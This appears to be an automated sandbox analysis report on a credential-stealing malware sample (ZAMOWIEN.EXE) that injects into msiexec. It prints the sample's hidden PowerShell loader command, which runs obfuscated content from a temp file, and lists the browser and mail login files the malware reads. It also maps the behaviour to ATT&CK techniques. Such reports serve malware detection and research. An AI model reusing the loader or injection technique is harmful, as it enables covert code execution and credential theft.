              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7089Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2579Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405459
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405E80 FindFirstFileA,FindClose,0_2_00405E80
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2511505619.000000000071B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeAPI call chain: ExitProcess graph end nodegraph_0-3246
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04BD7128 LdrInitializeThunk,2_2_04BD7128
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A70000Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden "$chippies=get-content -raw 'c:\users\user~1\appdata\local\temp\deciliteren\afstnings\rapses.arb';$notaudskrivningsdatoen=$chippies.substring(53160,3);.$notaudskrivningsdatoen($chippies)"
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden "$chippies=get-content -raw 'c:\users\user~1\appdata\local\temp\deciliteren\afstnings\rapses.arb';$notaudskrivningsdatoen=$chippies.substring(53160,3);.$notaudskrivningsdatoen($chippies)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405B9E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B9E

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7660, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7660, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7660, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Obfuscated Files or Information
              1
              OS Credential Dumping
              3
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              1
              Exfiltration Over Alternative Protocol
              1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts311
              Process Injection
              1
              Software Packing
              LSASS Memory24
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager111
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
